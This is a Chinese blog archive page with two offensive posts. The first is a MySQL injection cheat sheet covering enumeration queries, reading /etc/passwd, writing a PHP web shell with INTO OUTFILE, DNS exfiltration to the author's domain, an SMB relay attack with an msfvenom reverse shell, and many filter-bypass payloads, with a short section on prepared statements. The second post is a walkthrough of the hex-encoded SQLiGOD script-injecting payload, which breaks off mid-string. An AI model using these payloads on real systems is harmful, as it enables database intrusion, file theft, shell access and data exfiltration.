Category Archives: 渗透测试

MySQL注入攻击与防御

Author:rootclay

本文主要是做一个Mysql的注入总结,对于Mysql来说利用的方式太过于灵活,这里总结了一些主流的一些姿势,如果有好的姿势可以多加交流,文章如果有错也欢迎各位dalao指出:)

[TOC]

注入常用函数与字符

下面几点是注入中经常会用到的语句

  • 控制语句操作(select, case, if(), …)
  • 比较操作(=, like, mod(), …)
  • 字符串的猜解操作(mid(), left(), rpad(), …)
  • 字符串生成操作(0x61, hex(), conv()(使用conv([10-36],10,36)可以实现所有字符的表示))

测试注入

可以用以下语句对一个可能的注入点进行测试

string numeric login
' AND 1 ' OR '1
' ' AND 0 ' OR 1 — –
" AND true " OR "" = "
"" AND false " OR 1 = 1 — –
\ 12 '='
\ 12 'LIKE'
'=0–+
SELECT FROM Users WHERE id = '1''';<br>SELECT 1 FROM Users WHERE 1 = '1'''''''''''''UNION SELECT '2'; SELECT FROM Users WHERE id = 3-2; SELECT * FROM Users WHERE username = 'admin' AND password = '' OR '' = '';

注释符

以下是Mysql中可以用到的注释符:

符号 解释
# Hash注释
/* C语言风格注释
SQL语句注释
;%00 空字节
` 反引号(只能在语句尾使用)

Examples:

SELECT * FROM Users WHERE username = &#39;&#39; OR 1=1 -- -&#39; AND password = &#39;&#39;;
SELECT * FROM Users WHERE id = &#39;&#39; UNION SELECT 1, 2, 3`&#39;;

版本&主机名&用户&库名

版本 主机名 用户 库名
VERSION() @@HOSTNAME user() database()
@@VERSION currentuser() SELECT schemaname FROM informationschema.schemata;
@@GLOBAL.VERSION systemuser() SELECT DISTINCT(db) FROM mysql.db;–
/!mysql版本号/(/!50094eaea/)当数字小于版本号时返回TRUE sessionuser()
SELECT * FROM Users WHERE id = ‘1’ AND MID(VERSION(),1,1) = ‘5’; SELECT CONCATWS(0x3A, user, password) FROM mysql.user WHERE user = ‘root’–

表和字段

确定字段数

ORDER BY

ORDER BY用于判断表中的字段个数

column column
1′ ORDER BY 1–+ True
1′ ORDER BY 2–+ True
1′ ORDER BY 3–+ True
1′ ORDER BY 4–+ False – 字段有三个
-1′ UNION SELECT 1,2,3–+ True

SELECT … INTO

关于SELECT … INTO 的解释可以看这一篇文章SELECT … INTO解释

语句 返回
-1 UNION SELECT 1 INTO @,@,@ The used SELECT statements have a different number of columns
-1 UNION SELECT 1 INTO @,@ The used SELECT statements have a different number of columns
-1 UNION SELECT 1 INTO @ 没有报错就说明只有一列

当出现LIMIT时可以用以下语句:

SELECT username FROM Users limit 1,{INJECTION POINT};
语句 释意
1 INTO @,@,@ The used SELECT statements have a different number of columns
1 INTO @,@ 没有报错就说明只有两列

判断已知表名的字段数

AND (SELECT * FROM SOME_EXISTING_TABLE) = 1
SELECT passwd FROM Users WHERE id = {INJECTION POINT};
语句 释意
1 AND (SELECT * FROM Users) = 1 Operand should contain 3 column(s)说明只有3列

查表名

以下提过几种方式对库中表进行查询

UNION查询 BLIND盲注 ERROR报错
UNION SELECT GROUPCONCAT(tablename) FROM informationschema.tables AND SELECT SUBSTR(tablename,1,1) FROM informationschema.tables > 'A' 1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,tablename,0x7e) FROM informationschema.tables where tableschema=database() LIMIT 0,1)) from informationschema.tables limit 0,1),floor(rand(0)2))x from informationschema.tables group by x)a)

查列名

以下提过几种方式对表中列进行查询

UNION查询 BLIND盲注 ERROR报错 PROCEDURE ANALYSE
UNION SELECT GROUPCONCAT(columnname) FROM informationschema.columns WHERE tablename = 'tablename' 可以不使用单引号,用16进制 AND SELECT SUBSTR(columnname,1,1) FROM informationschema.columns > 'A' 1+and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,columnname,0x7e) FROM informationschema.columns where tablename=0x61646D696E LIMIT 0,1)) from informationschema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a) 1 LIMIT 1,1 PROCEDURE ANALYSE() 获取到第二个字段名

字符串连接

下面的几条语句都可以用以连接字符

字符串连接方式
SELECT 'a' 'd' 'mi' 'n';
SELECT CONCAT('a', 'd', 'm', 'i', 'n');
SELECT CONCATWS('', 'a', 'd', 'm', 'i', 'n');
SELECT GROUPCONCAT('a', 'd', 'm', 'i', 'n');

条件语句&时间函数

语句 释意
CASE SLEEP() mysql5以上才引入
IF() BENCHMARK() mysql4/5都有
IFNULL() ' – (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) – '
NULLIF() SELECT IF(1=1, sleep(5), false);
SELECT IF(1=1, true, false);
SELECT CASE WHEN 1=1 THEN true ELSE false END;

其中BENCHMARK函数是指执行某函数的次数,次数多时能够达到与sleep函数相同的效果

文件操作

文件操作权限

在MySQL中,存在一个称为securefilepriv的全局系统变量。 该变量用于限制数据的导入和导出操作,例如SELECT … INTO OUTFILE语句和LOAD_FILE()

  1. 如果securefilepriv变量为空那么直接可以使用函数,如果为null是不能使用
  2. 但在mysql的5.5.53之前的版本是默认为空,之后的版本为null,所有是将这个功能禁掉了

mysql——file

也可使用如下语句查询

语句 是否需需要root 版本支持
SELECT filepriv FROM mysql.user WHERE user = 'username'; 需要root mysql4/5
SELECT grantee, isgrantable FROM informationschema.userprivileges WHERE privilege_type = 'file' AND grantee like '%username%'; 不需要root mysql5

读文件

读文件函数LOAD_FILE()

Examples:

SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE(0x2F6574632F706173737764);

注意点:
1. LOAD_FILE的默认目录@@datadir
2. 文件必须是当前用户可读
3. 读文件最大的为1047552个byte, @@max_allowed_packet可以查看文件读取最大值

写文件

INTO OUTFILE/DUMPFILE

经典写文件例子:

To write a PHP shell:
SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';


这两个函数都可以写文件,但是有很大的差别
INTO OUTFILE函数写文件时会在每一行的结束自动加上换行符
INTO DUMPFILE函数在写文件会保持文件得到原生内容,这种方式对于二进制文件是最好的选择
当我们在UDF提权的场景是需要上传二进制文件等等用OUTFILE函数是不能成功的

网上有很多文章介绍,比如这篇

注意点:
1. INTO OUTFILE不会覆盖文件
2. INTO OUTFILE必须是查询语句的最后一句
3. 路径名是不能编码的,必须使用单引号

带外通道

关于带外通道的注入前段时间国外的大佬已经总结过了,我基本复现了一下,博客有文章,这里简单提一下

什么是带外通道注入?

带外通道攻击主要是利用其他协议或者渠道从服务器提取数据. 它可能是HTTP(S)请求,DNS解析服务,SMB服务,Mail服务等.

条件限制

  • 首先不用多说,这些函数是需要绝对路径的
  • 如果securefilepriv变量为空那么直接可以使用函数,如果为null是不能使用
  • 但在mysql的5.5.53之前的版本是默认为空,之后的版本为null,所有是将这个功能禁掉了

DNS注入

select load_file(concat('\\\\',version(),'.rootclay.club\\clay.txt'));
select load_file(concat(0x5c5c5c5c,version(),0x2e6861636b65722e736974655c5c612e747874));

上面的语句执行的结果我们可以通过wireshark抓包看一下,过滤一下DNS协议即可清晰看到数据出去的样子,如下图

进行DNS注入需要域名解析,自己有的话最好,但是没有的朋友也没事,这里推荐一个网站CEYE可以查看数据

SMB Relay 注入攻击

What is SMB relay

这里简单的描述一下SMB relay这个过程

假设有主机B与A
(1) A向B发起连接请求
(2) B向A发送挑战(一组随机数据,8字节)
(3) A用源自明文口令的DESKEY对挑战进行标准DES加密得到响应,并发往B
(4) B从SAM中获取A的LM Hash、NTLM Hash,计算出DESKEY,并对前面发往A的挑战进
行标准DES加密
(5) 如果(4)中计算结果与A送过来的响应匹配,A被允许访问B
现在假设一个攻击者C卷入其中
(1) C向B发起连接请求
(2) B向C发送挑战D(一组随机数据)
(3) C等待A向B发起连接请求
(4) 当A向B发起连接请求时,C伪造成B向A发送挑战D
(5) A用源自明文口令的DESKEY对挑战D进行标准DES加密得到响应E,并发往B
(6) C截获到响应E,将它做为针对(2)中挑战D的响应发往B,并声称自己是A
(7) B从SAM中获取A的LM Hash、NTLM Hash,计算出DESKEY,并对挑战D进行标准DES
加密
(8) 如果(7)中计算结果与C送过来的响应匹配,C被允许以A的身份访问B。

攻击流程

关于SMB relay攻击窃取NTML与shell请看这篇文章SMB Relay Demystified and NTLMv2 Pwnage with Python

整理了一下实际操作的步骤如下:
1. 首先生成一个反向shell:
msfvenom -p windows/meterpreter/reversetcp LHOST=攻击机ip LPORT=攻击机监听端口 -f exe > reverseshell.exe
2. 运行smbrelayx,指定被攻击者和生成的反向shell,等待连接。
smbrelayx.py -h 被攻击者ip -e 反向shell文件位置
3. 使用模块multi/handler。侦听攻击机ip,攻击机监听端口
4. 在MySQL Server上运行如下的代码,则会产生shell。相当于访问攻击机的smb服务,但实际上是窃取了mysqlserver的身份
select load
file('\\攻击机ip\aa');

绕过技巧

绕过单引号

语句 解释
SELECT FROM Users WHERE username = 0x61646D696E HEX编码
SELECT FROM Users WHERE username = CHAR(97, 100, 109, 105, 110) CHAR()函数

大小写绕过

?id=1+UnIoN+SeLecT+1,2,3--

替换绕过

?id=1+UNunionION+SEselectLECT+1,2,3--

注释绕过

?id=1+un/**/ion+se/**/lect+1,2,3--

特殊嵌入绕过

?id=1/*!UnIoN*/SeLecT+1,2,3--

宽字节注入

SQL注入中的宽字节国内最常使用的gbk编码,这种方式主要是绕过addslashes等对特殊字符进行转移的绕过。反斜杠()的十六进制为%5c,在你输入%bf%27时,函数遇到单引号自动转移加入\,此时变为%bf%5c%27,%bf%5c在gbk中变为一个宽字符“縗”。%bf那个位置可以是%81-%fe中间的任何字符。不止在sql注入中,宽字符注入在很多地方都可以应用。

MySQL版本号字符

Examples:
UNION SELECT /*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null-- x*/0,null--+
SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/);
  • 这样的查询语句是可以执行的,我理解为类似Python中第一行注释指定解析器一样#!/bin/sh
  • 对于小于或等于版本号的语句就会执行
  • 例如目前的Mysql版本为5.7.17那么/!50717/及其以下的语句即可执行

字符编码绕过

前端时间看到ph师傅的博客是讨论mysql字符编码的文章,大概意思如下,原文在这里
当出现有以下代码时,指设置了字符编码为utf-8,但并不是全部为utf-8,而在具体的转换过程中会出现意外的情况,具体可以看ph师傅的文章

$mysqli->query("set names utf8");

在sql查询中

test.php?username=admin%e4中的%e4会被admin忽略掉而绕过了一些逻辑,还有一些类似于$e4这样的字符如%c2等

绕空格

特殊字符绕过空格

字符 解释
09 Horizontal Tab
0A New Line
0B Vertical Tab
0C New Page
0D Carriage Return
A0 Non-breaking Space
20 Space
Example:</p>

<p>'%0AUNION%0CSELECT%A0NULL%20%23

括号绕过空格

字符 解释
28 (
29 )
Example:</p>

<p>UNION(SELECT(column)FROM(table))

and/or后插入字符绕过空格

任意混合+ - ~ !可以达到绕过空格的效果(可以现在本地测试,混合后需要的奇偶数可能不同)

SELECT DISTINCT(db) FROM mysql.db WHERE `Host`=&#39;localhost&#39; and-++-1=1;需要偶数个--

SELECT DISTINCT(db) FROM mysql.db WHERE `Host`=&#39;localhost&#39; and!!~~~~!1=1;需要奇数个!

其实一下的字符都可以测试

字符 释意
20 Space
2B +
2D
7E ~
21 !
40 @

注释符&引号

SELECT DISTINCT(db) FROM mysql.db WHERE `Host`=&#39;localhost&#39; and/**/1=1;
SELECT DISTINCT(db) FROM mysql.db WHERE `Host`=&#39;localhost&#39; and&quot;1=1&quot;;

编码绕过

column column
URL Encoding SELECT %74able%6eame FROM informationschema.tables;
Double URL Encoding SELECT %2574able%256eame FROM informationschema.tables;
Unicode Encoding SELECT %u0074able%u6eame FROM informationschema.tables;

关键字绕过

测试用例information_schema.tables

column column
空格 informationschema . tables
反引号 information</em>schema.tables
特殊符 /!informationschema.tables/
别名 informationschema.partitions,statistics,keycolumnusage,table_constraints

认证绕过

绕过语句:'='

select data from users where name="="
select data from users where flase="
select data from users where 0=0

绕过语句:'-'

select data from users where name=''-''
select data from users where name=0-0
select data from users where 0=0

比如登录的时候需要输入email和passwd,可以这样输入

email=''&password=''

类型转换

' or 1=true
' or 1
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users

我们还有关于此的漏洞,就以一次CTF的题目来说(源码如下):

&lt;?php
class fiter{
    var $str;
    var $order;

function sql_clean($str){
    if(is_array($str)){
        echo &quot;&lt;script&gt; alert(&#39;not array!!@_@&#39;);parent.location.href=&#39;index.php&#39;; &lt;/script&gt;&quot;;exit;
    }
    $filter = &quot;/ |\*|#|,|union|like|regexp|for|and|or|file|--|\||`|&amp;|&quot;.urldecode(&#39;%09&#39;).&quot;|&quot;.urldecode(&quot;%0a&quot;).&quot;|&quot;.urldecode(&quot;%0b&quot;).&quot;|&quot;.urldecode(&#39;%0c&#39;).&quot;|&quot;.urldecode(&#39;%0d&#39;).&quot;/i&quot;;
    if(preg_match($filter,$str)){
        echo &quot;&lt;script&gt; alert(&#39;illegal character!!@_@&#39;);parent.location.href=&#39;index.php&#39;; &lt;/script&gt;&quot;;exit;
    }else if(strrpos($str,urldecode(&quot;%00&quot;))){
        echo &quot;&lt;script&gt; alert(&#39;illegal character!!@_@&#39;);parent.location.href=&#39;index.php&#39;; &lt;/script&gt;&quot;;exit;
    }
    return $this-&gt;str=$str;
}

function ord_clean($ord){
    $filter = &quot; |bash|perl|nc|java|php|&gt;|&gt;&gt;|wget|ftp|python|sh&quot;;
    if (preg_match(&quot;/&quot;.$filter.&quot;/i&quot;,$ord) == 1){
        return $this-&gt;order = &quot;&quot;;
    }
    return $this-&gt;order = $ord;
}

}

这里过滤了很多关键词了,需要用到类型转换了,这里我们用+号

Payload如下:
uname=aa&#39;+(ascii(mid((passwd)from(1)))&gt;0)+&#39;1
执行的SQL语句如下:
xxxxxx where username = &#39;aa&#39;+(ascii(mid((passwd)from(users)))&gt;0)+&#39;1&#39;
这样就可以开始写脚本跑数据了

除了+号,其他算术操作符号也会发生类型的类型转换,例如MOD,DIV,*,/,%,-,
关于隐式类型转换的文章可以看这里

HTTP参数污染

当我们传入的参数为

http://sqlinjection.com/?par1=val1&amp;par1=val2

进入到不同的Web Server就可能得到不同的结果,这里借鉴一下国外大佬一篇文章的总结,如下:

Web Server Parameter Interpretation Example
ASP.NET/IIS Concatenation by comma par1=val1,val2
ASP/IIS Concatenation by comma par1=val1,val2
PHP/Apache The last param is resulting par1=val2
JSP/Tomcat The first param is resulting par1=val1
Perl/Apache The first param is resulting par1=val1
DBMan Concatenation by two tildes par1=val1~~val2

不同的web server的处理结果截然不同

Query String Apache/2.2.16, PHP/5.3.3 IIS6/ASP
?test[1=2 test_1=2 test[1=2
?test=% test=% test=
?test%00=1 test=1 test=1
?test=1%001 NULL test=1
?test+d=1+2 test_d=1 2 test d=1 2

这里也推荐一篇国外的文章

实战正则过滤绕过

过滤字符 PHP正则代码 原查询语句 现查询语句
and, or preg_match(‘/(and|or)/i’, $id) 1 or 1 = 1,1 and 1 = 1 1 || 1 = 1, 1 && 1 = 1
and, or, union preg_match(‘/(and|or|union)/i’, $id) union select user, password from users 1 || (select user from users where user_id = 1) = ‘admin’
and, or, union, where preg_match(‘/(and|or|union|where)/i’, $id) 1 || (select user from users where user_id = 1) = ‘admin’ 1 || (select user from users limit 1) = ‘admin’
and, or, union, where, limit preg_match(‘/(and|or|union|where|limit)/i’, $id) 1 || (select user from users limit 1) = ‘admin’ 1 || (select user from users group by user_id having user_id = 1) = ‘admin’
and, or, union, where, limit, group by preg_match(‘/(and|or|union|where|limit|group by)/i’, $id) 1 || (select user from users group by user_id having user_id = 1) = ‘admin’ 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1
and, or, union, where, limit, group by, select preg_match(‘/(and|or|union|where|limit|group by|select)/i’, $id) 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 1 || 1 = 1 into outfile ‘result.txt’
1 || substr(user,1,1) = ‘a’
and, or, union, where, limit, group by, select, ‘ preg_match(‘/(and|or|union|where|limit|group by|select|\’)/i’, $id) 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1 1 || user_id is not null
1 || substr(user,1,1) = 0x61
1 || substr(user,1,1) = unhex(61)
and, or, union, where, limit, group by, select, ‘, hex preg_match(‘/(and|or|union|where|limit|group by|select|\’|hex)/i’, $id) 1 || substr(user,1,1) = unhex(61) 1 || substr(user,1,1) = lower(conv(11,10,36))
and, or, union, where, limit, group by, select, ‘, hex, substr preg_match(‘/(and|or|union|where|limit|group by|select|\’|hex|substr)/i’, $id) 1 || substr(user,1,1) = lower(conv(11,10,36)) 1 || lpad(user,7,1)
and, or, union, where, limit, group by, select, ‘, hex, substr, white space preg_match(‘/(and|or|union|where|limit|group by|select|\’|hex|substr|\s)/i’, $id) 1 || lpad(user,7,1) 1%0b||%0blpad(user,7,1)

防御手段(代码以PHP为例)

像WAF之类防御手段自己无能为力经常打补丁就好,这里主要提一下代码层面的问题
推荐使用下面的方式进行查询:

MYSQLi

$stmt = $db->prepare('update name set name = ? where id = ?');
$stmt->bind_param('si',$name,$id);
$stmt->execute();

ODBC

$stmt = odbc_prepare( $conn, 'SELECT * FROM users WHERE email = ?' );
$success = odbc_execute( $stmt, array($email) );

或者

$dbh = odbc_exec($conn, 'SELECT * FROM users WHERE email = ?', array($email));
$sth = $dbh->prepare('SELECT * FROM users WHERE email = :email');
$sth->execute(array(':email' => $email));

PDO

$dbh = new PDO('mysql:dbname=testdb;host=127.0.0.1', $user, $password);
$stmt = $dbh->prepare('INSERT INTO REGISTRY (name, value) VALUES (:name, :value)');
$stmt->bindParam(':name', $name);
$stmt->bindParam(':value', $value);</p>

<p>// insert one row
$name = 'one';
$value = 1;
$stmt->execute();

或者

$dbh = new PDO('mysql:dbname=testdb;host=127.0.0.1', $user, $password);
$stmt = $dbh->prepare('UPDATE people SET name = :new<em>name WHERE id = :id');
$stmt->execute( array('new</em>name' => $name, 'id' => $id) );

框架

对于框架的话只要遵循框架的API就好,例如wp的查询

global $wpdb;
$wpdb->query(
    $wpdb->prepare( 'SELECT name FROM people WHERE id = %d OR email = %s',
        $person_id, $person_email
    )
);
或者
global $wpdb;
$wpdb->insert( 'people',
        array(
            'person_id' => '123',
            'person_email' => 'bobby@tables.com'
        ),
    array( '%d', '%s' )
);

参考

这篇文章主要是做一个总结,有的点可能描述的不是很细致,可以自己再深入研究

从SQLiGOD到XSS

0x00 前言
之前一两个月 国外好像发了一个叫做SQLiGOD的东西 感觉有点6 所以就去研究了一下 然后还用来出在了sctf的一道题里面

0x01 SQLiGOD
SQLiGOD是国外的MakMan写的 用来辅助mysql注入的一个东西 其实本质是一段concat函数
本质是利用mysql中的union回显来构成一个html代码的操作 方便了注入的过程
出来有段时间了 之前kuuki牛发到drop没过 就发zone了 在zone里有一些简单的介绍

这里是他的payload

concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456e746572205468652055726c20796f7527726520747279696e6720746f20496e6a65637420616e6420777269746520276d616b6d616e2720617420796f757220496e6a656374696f6e20506f696e742c204578616d706c65203a20687474703a2f2f736974652e636f6d2f66696c652e7068703f69643d2d3420554e494f4e2053454c45435420312c322c332c636f6e6361742830783664363136622c6d616b6d616e292c352d2d2b2d204e4f5445203a204a757374207265706c61636520796f757220496e6a656374696f6e20706f696e742077697468206b6579776f726420276d616b6d616e2722293b3c2f7363726970743e,0x3c623e3c666f6e7420636f6c6f723d7265643e53514c69474f44732053796e746178205620312e30204279204d616b4d616e3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d343e496e6a6563746564206279203c7363726970743e646f63756d656e742e7772697465286e616d65293b3c2f7363726970743e3c2f666f6e743e3c62723e3c7461626c6520626f726465723d2231223e3c74723e3c74643e44422056657273696f6e203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,version(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e2044422055736572203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,user(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e5072696d617279204442203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,database(),0x203c2f74643e3c2f74723e3c2f7461626c653e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e43686f6f73652061207461626c652066726f6d207468652064726f70646f776e206d656e75203a203c2f666f6e743e3c62723e,concat(0x3c7363726970743e66756e6374696f6e20746f48657828737472297b76617220686578203d27273b666f722876617220693d303b693c7374722e6c656e6774683b692b2b297b686578202b3d2027272b7374722e63686172436f646541742869292e746f537472696e67283136293b7d72657475726e206865783b7d66756e6374696f6e2072656469726563742873697465297b6d616b73706c69743d736974652e73706c697428222e22293b64626e616d653d6d616b73706c69745b305d3b74626c6e616d653d6d616b73706c69745b315d3b6d616b7265703d22636f6e636174284946284074626c3a3d3078222b746f4865782874626c6e616d65292b222c3078302c307830292c4946284064623a3d3078222b746f4865782864626e616d65292b222c3078302c307830292c636f6e6361742830783363373336333732363937303734336537353732366333643232222b746f4865782875726c292b2232323362336332663733363337323639373037343365292c636f6e63617428636f6e6361742830783363373336333732363937303734336536343632336432322c4064622c307832323362373436323663336432322c4074626c2c3078323233623363326637333633373236393730373433652c30783363363233653363363636663665373432303633366636633666373233643732363536343365323035333531346336393437346634343733323035333739366537343631373832303536323033313265333032303432373932303464363136623464363136653363326636363666366537343365336336323732336533633632373233653534363136323663363532303465363136643635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4074626c2c3078336332663636366636653734336532303636373236663664323036343631373436313632363137333635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4064622c307833633266363636663665373433653363363237323365346537353664363236353732323034663636323034333666366337353664366537333230336132303363363636663665373432303633366636633666373233643632366337353635336533633733363337323639373037343365363336663663363336653734336432322c2853454c45435420636f756e7428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d40646220616e64207461626c655f6e616d653d4074626c292c3078323233623634366636333735366436353665373432653737373236393734363532383633366636633633366537343239336233633266373336333732363937303734336533633266363636663665373433652c307833633632373233652c2873656c65637420284078292066726f6d202873656c656374202840783a3d30783030292c284063686b3a3d31292c202873656c656374202830292066726f6d2028696e666f726d6174696f6e5f736368656d612e636f6c756d6e732920776865726520287461626c655f736368656d613d3078222b746f4865782864626e616d65292b222920616e6420287461626c655f6e616d653d3078222b746f4865782874626c6e616d65292b222920616e642028307830302920696e202840783a3d636f6e6361745f777328307832302c40782c4946284063686b3d312c30783363373336333732363937303734336532303633366636633665363136643635323033643230366536353737323034313732373236313739323832393362323037363631373232303639323033643230333133622c30783230292c30783230363336663663366536313664363535623639356432303364323032322c636f6c756d6e5f6e616d652c307832323362323036393262326233622c4946284063686b3a3d322c307832302c30783230292929292978292c30783636366637323238363933643331336236393363336436333666366336333665373433623639326232623239376236343666363337353664363536653734326537373732363937343635323832323363363636663665373432303633366636633666373233643637373236353635366533653232326236393262323232653230336332663636366636653734336532323262363336663663366536313664363535623639356432623232336336323732336532323239336237643363326637333633373236393730373433652c636f6e6361742830783363363233652c307833633733363337323639373037343365373137353635373237393364323232323362363636663732323836393364333133623639336336333666366336333665373433623639326232623239376237313735363537323739336437313735363537323739326236333666366336653631366436353562363935643262323232633330373833323330333336313333363133323330326332323362376437353732366333643735373236633265373236353730366336313633363532383232323732323263323232353332333732323239336236343664373037313735363537323739336437353732366332653732363537303663363136333635323832323664363136623664363136653232326332323238373336353663363536333734323834303239323036363732366636643238373336353663363536333734323834303361336433303738333033303239323032633238373336353663363536333734323032383430323932303636373236663664323832323262363436323262323232653232326237343632366332623232323937373638363537323635323834303239323036393665323032383430336133643633366636653633363137343566373737333238333037383332333032633430326332323262373137353635373237393262323233303738333336333336333233373332333336353239323932393239363132393232323933623634366636333735366436353665373432653737373236393734363532383232336336313230363837323635363633643237323232623634366437303731373536353732373932623232323733653433366336393633366232303438363537323635323037343666323034343735366437303230373436383639373332303737363836663663363532303534363136323663363533633631336532323239336233633266373336333732363937303734336529292929223b75726c3d75726c2e7265706c616365282227222c2225323722293b75726c706173313d75726c2e7265706c61636528226d616b6d616e222c6d616b726570293b77696e646f772e6f70656e2875726c70617331293b7d3c2f7363726970743e3c73656c656374206f6e6368616e67653d22726564697265637428746869732e76616c756529223e3c6f7074696f6e2076616c75653d226d6b6e6f6e65222073656c65637465643e43686f6f73652061205461626c653c2f6f7074696f6e3e,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c6f7074696f6e2076616c75653d22,UNHEX(HEX(table_schema)),0x2e,UNHEX(HEX(table_name)),0x223e,UNHEX(HEX(concat(0x4461746162617365203a3a20,table_schema,0x203a3a205461626c65203a3a20,table_name))),0x3c2f6f7074696f6e3e))))x),0x3c2f73656c6563743e),0x3c62723e3c62723e3c62723e3c62723e3c62723e)

具体的用法我就用 一个网站的 来演示一下

0x02 演示
http://hackinglab.sinaapp.com/

就用这个站上面的 一个题
第二个mysql注入 union的回显的注入
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php

先来看看这个注入

<!-- tips: id=1

另外:通过前两个SQL注入题基本了解题目架构(SAE+RDS),有些注入在云环境下会有些不同之处-->

提示了一个参数id=1 尝试用GET来提交他看看
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=2

等等 发现回显的内容不一样了
可以尝试一下注入的测试
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=2-1

发现可以注入 然后看看字段
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 order by 3
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 order by 4

发现了id为3没报错 而4报错了 确定了 字段数是3

用union select 看看回显了哪些
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 and 1=2 union select 1,2,3
会发现 回显了2 3 这两个字段

那么注入到了这个阶段就可以尝试用SQLiGOD来尝试辅助我们

concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456e746572205468652055726c20796f7527726520747279696e6720746f20496e6a65637420616e6420777269746520276d616b6d616e2720617420796f757220496e6a656374696f6e20506f696e742c204578616d706c65203a20687474703a2f2f736974652e636f6d2f66696c652e7068703f69643d2d3420554e494f4e2053454c45435420312c322c332c636f6e6361742830783664363136622c6d616b6d616e292c352d2d2b2d204e4f5445203a204a757374207265706c61636520796f757220496e6a656374696f6e20706f696e742077697468206b6579776f726420276d616b6d616e2722293b3c2f7363726970743e,0x3c623e3c666f6e7420636f6c6f723d7265643e53514c69474f44732053796e746178205620312e30204279204d616b4d616e3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d343e496e6a6563746564206279203c7363726970743e646f63756d656e742e7772697465286e616d65293b3c2f7363726970743e3c2f666f6e743e3c62723e3c7461626c6520626f726465723d2231223e3c74723e3c74643e44422056657273696f6e203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,version(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e2044422055736572203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,user(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e5072696d617279204442203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,database(),0x203c2f74643e3c2f74723e3c2f7461626c653e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e43686f6f73652061207461626c652066726f6d207468652064726f70646f776e206d656e75203a203c2f666f6e743e3c62723e,concat(0x3c7363726970743e66756e6374696f6e20746f48657828737472297b76617220686578203d27273b666f722876617220693d303b693c7374722e6c656e6774683b692b2b297b686578202b3d2027272b7374722e63686172436f646541742869292e746f537472696e67283136293b7d72657475726e206865783b7d66756e6374696f6e2072656469726563742873697465297b6d616b73706c69743d736974652e73706c697428222e22293b64626e616d653d6d616b73706c69745b305d3b74626c6e616d653d6d616b73706c69745b315d3b6d616b7265703d22636f6e636174284946284074626c3a3d3078222b746f4865782874626c6e616d65292b222c3078302c307830292c4946284064623a3d3078222b746f4865782864626e616d65292b222c3078302c307830292c636f6e6361742830783363373336333732363937303734336537353732366333643232222b746f4865782875726c292b2232323362336332663733363337323639373037343365292c636f6e63617428636f6e6361742830783363373336333732363937303734336536343632336432322c4064622c307832323362373436323663336432322c4074626c2c3078323233623363326637333633373236393730373433652c30783363363233653363363636663665373432303633366636633666373233643732363536343365323035333531346336393437346634343733323035333739366537343631373832303536323033313265333032303432373932303464363136623464363136653363326636363666366537343365336336323732336533633632373233653534363136323663363532303465363136643635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4074626c2c3078336332663636366636653734336532303636373236663664323036343631373436313632363137333635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4064622c307833633266363636663665373433653363363237323365346537353664363236353732323034663636323034333666366337353664366537333230336132303363363636663665373432303633366636633666373233643632366337353635336533633733363337323639373037343365363336663663363336653734336432322c2853454c45435420636f756e7428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d40646220616e64207461626c655f6e616d653d4074626c292c3078323233623634366636333735366436353665373432653737373236393734363532383633366636633633366537343239336233633266373336333732363937303734336533633266363636663665373433652c307833633632373233652c2873656c65637420284078292066726f6d202873656c65637420